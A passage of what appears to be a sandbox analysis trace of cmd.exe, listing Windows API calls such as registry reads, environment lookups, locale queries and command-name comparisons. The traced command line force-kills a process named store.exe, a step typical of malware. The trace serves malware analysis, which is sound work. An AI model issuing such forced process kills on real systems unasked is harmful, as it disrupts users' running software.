(lpTopLevelExceptionFilter=0xe06fd0) returned 0x0 [0051.530] __getmainargs (in: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac, _DoWildCard=0, _StartInfo=0xe1d1b8 | out: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac) returned 0 [0051.530] _onexit (_Func=0xe08030) returned 0xe08030 [0051.530] _onexit (_Func=0xe08040) returned 0xe08040 [0051.530] _onexit (_Func=0xe08050) returned 0xe08050 [0051.530] _onexit (_Func=0xe08060) returned 0xe08060 [0051.530] _onexit (_Func=0xe08070) returned 0xe08070 [0051.531] _onexit (_Func=0xe08080) returned 0xe08080 [0051.531] GetCurrentThreadId () returned 0x344 [0051.531] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x344) returned 0xbc [0051.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0051.531] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0051.531] SetThreadUILanguage (LangId=0x0) returned 0x3f0409 [0051.653] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0051.653] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ffcd0 | out: phkResult=0x4ffcd0*=0x0) returned 0x2 [0051.653] VirtualQuery (in: lpAddress=0x4ffcdb, lpBuffer=0x4ffc88, dwLength=0x1c | out: lpBuffer=0x4ffc88*(BaseAddress=0x4ff000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.653] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x4ffc88, dwLength=0x1c | out: lpBuffer=0x4ffc88*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0051.653] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x4ffc88, dwLength=0x1c | out: lpBuffer=0x4ffc88*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0051.653] VirtualQuery (in: lpAddress=0x403000, lpBuffer=0x4ffc88, dwLength=0x1c | out: lpBuffer=0x4ffc88*(BaseAddress=0x403000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.653] VirtualQuery (in: lpAddress=0x500000, lpBuffer=0x4ffc88, dwLength=0x1c | out: lpBuffer=0x4ffc88*(BaseAddress=0x500000, AllocationBase=0x500000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.654] GetConsoleOutputCP () returned 0x1b5 [0051.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0051.773] SetConsoleCtrlHandler (HandlerRoutine=0xe17260, Add=1) returned 1 [0051.773] _get_osfhandle (_FileHandle=1) returned 0x90 [0051.773] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe2388c | out: lpMode=0xe2388c) returned 1 [0052.513] _get_osfhandle (_FileHandle=0) returned 0x8c [0052.513] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23888 | out: lpMode=0xe23888) returned 1 [0052.551] _get_osfhandle (_FileHandle=1) returned 0x90 [0052.551] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0052.738] _get_osfhandle (_FileHandle=1) returned 0x90 [0052.738] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0052.776] _get_osfhandle (_FileHandle=1) returned 0x90 [0052.776] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0052.846] _get_osfhandle (_FileHandle=0) returned 0x8c [0052.846] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0052.953] _get_osfhandle (_FileHandle=0) returned 0x8c [0052.953] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0052.986] GetEnvironmentStringsW () returned 0x674bd0* [0052.986] GetProcessHeap () returned 0x670000 [0052.986] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xaca) returned 0x6756a8 [0052.987] FreeEnvironmentStringsA (penv="A") returned 1 [0052.987] GetProcessHeap () returned 0x670000 [0052.987] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4) returned 0x6746b0 [0052.987] GetEnvironmentStringsW () returned 0x674bd0* [0052.987] GetProcessHeap () returned 0x670000 [0052.987] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xaca) returned 0x676180 [0052.987] FreeEnvironmentStringsA (penv="A") returned 1 [0052.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fec2c | out: phkResult=0x4fec2c*=0xcc) returned 0x0 [0052.987] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x0, lpData=0x4fec38*=0xc5, lpcbData=0x4fec30*=0x1000) returned 0x2 [0052.987] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x1, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.987] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x0, lpData=0x4fec38*=0x1, lpcbData=0x4fec30*=0x1000) returned 0x2 [0052.987] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x0, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.987] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x40, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.987] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x40, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.987] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x0, lpData=0x4fec38*=0x40, lpcbData=0x4fec30*=0x1000) returned 0x2 [0052.987] RegCloseKey (hKey=0xcc) returned 0x0 [0052.988] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fec2c | out: phkResult=0x4fec2c*=0xcc) returned 0x0 [0052.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x0, lpData=0x4fec38*=0x40, lpcbData=0x4fec30*=0x1000) returned 0x2 [0052.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x1, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x0, lpData=0x4fec38*=0x1, lpcbData=0x4fec30*=0x1000) returned 0x2 [0052.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x0, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x9, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x4, lpData=0x4fec38*=0x9, lpcbData=0x4fec30*=0x4) returned 0x0 [0052.988] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fec34, lpData=0x4fec38, lpcbData=0x4fec30*=0x1000 | out: lpType=0x4fec34*=0x0, lpData=0x4fec38*=0x9, lpcbData=0x4fec30*=0x1000) returned 0x2 [0052.988] RegCloseKey (hKey=0xcc) returned 0x0 [0052.988] time (in: timer=0x0 | out: timer=0x0) returned 0x5d302273 [0052.988] srand (_Seed=0x5d302273) [0052.988] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im store.exe" [0052.988] malloc (_Size=0x4000) returned 0x6621f0 [0052.989] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im store.exe" [0052.989] malloc (_Size=0xffce) returned 0x870048 [0052.989] ??_V@YAXPAX@Z () returned 0x4ffc10 [0052.989] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x870048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0052.990] malloc (_Size=0xffce) returned 0x880020 [0052.990] ??_V@YAXPAX@Z () returned 0x4ff9e4 [0052.990] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x880020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0052.990] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0052.990] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0052.990] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0052.990] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0052.991] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0052.991] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0052.991] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0052.991] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0052.991] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0052.991] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0052.991] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0052.991] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0052.991] GetProcessHeap () returned 0x670000 [0052.991] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6756a8) returned 1 [0052.991] GetEnvironmentStringsW () returned 0x674bd0* [0052.991] GetProcessHeap () returned 0x670000 [0052.991] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xae2) returned 0x677748 [0052.991] FreeEnvironmentStringsA (penv="A") returned 1 [0052.991] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0052.991] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0052.991] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0052.991] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0052.991] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0052.991] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0052.991] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0052.991] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0052.991] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0052.991] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0052.992] malloc (_Size=0xffce) returned 0x88fff8 [0052.992] ??_V@YAXPAX@Z () returned 0x4ff77c [0052.992] GetProcessHeap () returned 0x670000 [0052.992] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x38) returned 0x670ae0 [0052.992] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x88fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0052.992] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x88fff8, lpFilePart=0x4ff7c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x4ff7c8*="Desktop") returned 0x17 [0052.993] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0052.993] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4ff548 | out: lpFindFileData=0x4ff548*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x670b20 [0052.993] FindClose (in: hFindFile=0x670b20 | out: hFindFile=0x670b20) returned 1 [0052.993] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x4ff548 | out: lpFindFileData=0x4ff548*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x670b20 [0052.993] FindClose (in: hFindFile=0x670b20 | out: hFindFile=0x670b20) returned 1 [0052.993] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x4ff548 | out: lpFindFileData=0x4ff548*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff77889f, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xff77889f, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x670b20 [0052.993] FindClose (in: hFindFile=0x670b20 | out: hFindFile=0x670b20) returned 1 [0052.994] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0052.994] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0052.994] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0052.994] GetProcessHeap () returned 0x670000 [0052.994] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x677748) returned 1 [0052.994] GetEnvironmentStringsW () returned 0x674bd0* [0052.994] GetProcessHeap () returned 0x670000 [0052.994] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xb1a) returned 0x676c58 [0052.994] FreeEnvironmentStringsA (penv="=") returned 1 [0052.994] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x870048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0052.994] GetProcessHeap () returned 0x670000 [0052.994] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x670ae0) returned 1 [0052.994] ??_V@YAXPAX@Z () returned 0x1 [0052.994] ??_V@YAXPAX@Z () returned 0x1 [0052.994] GetProcessHeap () returned 0x670000 [0052.994] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x400e) returned 0x678d60 [0052.994] GetProcessHeap () returned 0x670000 [0052.994] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x5a) returned 0x677780 [0052.994] GetProcessHeap () returned 0x670000 [0052.995] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x678d60) returned 1 [0052.995] GetConsoleOutputCP () returned 0x1b5 [0053.020] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0053.020] GetUserDefaultLCID () returned 0x409 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xe1f82c, cchData=8 | out: lpLCData=":") returned 2 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4ffb38, cchData=128 | out: lpLCData="0") returned 2 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4ffb38, cchData=128 | out: lpLCData="0") returned 2 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4ffb38, cchData=128 | out: lpLCData="1") returned 2 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xe1f81c, cchData=8 | out: lpLCData="/") returned 2 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xe1f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xe1f778, cchData=32 | out: lpLCData="Tue") returned 4 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xe1f738, cchData=32 | out: lpLCData="Wed") returned 4 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xe1f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xe1f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xe1f678, cchData=32 | out: lpLCData="Sat") returned 4 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xe1f638, cchData=32 | out: lpLCData="Sun") returned 4 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xe1f80c, cchData=8 | out: lpLCData=".") returned 2 [0053.021] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xe1f7f8, cchData=8 | out: lpLCData=",") returned 2 [0053.021] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0053.023] GetProcessHeap () returned 0x670000 [0053.023] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20c) returned 0x677830 [0053.023] GetConsoleTitleW (in: lpConsoleTitle=0x677830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0053.028] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0053.028] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0053.029] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0053.029] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0053.029] ??_V@YAXPAX@Z () returned 0x1 [0053.029] GetProcessHeap () returned 0x670000 [0053.029] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x400a) returned 0x678d60 [0053.029] GetProcessHeap () returned 0x670000 [0053.029] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x678d60) returned 1 [0053.030] _wcsicmp (_String1="taskkill.exe", _String2=")") returned 75 [0053.030] _wcsicmp (_String1="FOR", _String2="taskkill.exe") returned -14 [0053.030] _wcsicmp (_String1="FOR/?", _String2="taskkill.exe") returned -14 [0053.030] _wcsicmp (_String1="IF", _String2="taskkill.exe") returned -11 [0053.030] _wcsicmp (_String1="IF/?", _String2="taskkill.exe") returned -11 [0053.030] _wcsicmp (_String1="REM", _String2="taskkill.exe") returned -2 [0053.030] _wcsicmp (_String1="REM/?", _String2="taskkill.exe") returned -2 [0053.030] GetProcessHeap () returned 0x670000 [0053.030] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x58) returned 0x677a48 [0053.030] GetProcessHeap () returned 0x670000 [0053.030] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x22) returned 0x677aa8 [0053.031] GetProcessHeap () returned 0x670000 [0053.031] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3e) returned 0x677ad8 [0053.031] GetConsoleTitleW (in: lpConsoleTitle=0x4ffa30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0053.032] malloc (_Size=0xffce) returned 0x882638 [0053.032] ??_V@YAXPAX@Z () returned 0x4ff7bc [0053.032] malloc (_Size=0xffce) returned 0x892610 [0053.033] ??_V@YAXPAX@Z () returned 0x4ff574 [0053.034] GetFileAttributesW (lpFileName="taskkill.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\taskkill.exe")) returned 0xffffffff [0053.034] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0053.034] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0053.034] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0053.034] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0053.034] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0053.034] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0053.034] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0053.034] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0053.034] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0053.034] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0053.034] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0053.034] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0053.034] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0053.034] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0053.034] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0053.034] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0053.034] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0053.034] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0053.034] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0053.035] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0053.035] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0053.035] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0053.035] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0053.035] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0053.035] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0053.035] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0053.035] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0053.035] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0053.035] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0053.035] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0053.035] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0053.035] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0053.035] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0053.035] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0053.035] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0053.035] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0053.035] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0053.035] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0053.035] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0053.035] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0053.035] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0053.035] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0053.035] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0053.035] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0053.035] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0053.035] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0053.035] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0053.035] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0053.035] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0053.035] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0053.035] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0053.036] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0053.036] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0053.036] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0053.036] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0053.036] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0053.036] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0053.036] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0053.036] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0053.036] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0053.036] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0053.036] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0053.036] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0053.036] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0053.036] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0053.036] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0053.036] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0053.036] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0053.036] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0053.036] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0053.036] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0053.036] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0053.036] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0053.036] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0053.036] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0053.036] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0053.036] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0053.036] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0053.036] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0053.036] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0053.036] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0053.036] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0053.036] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0053.037] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 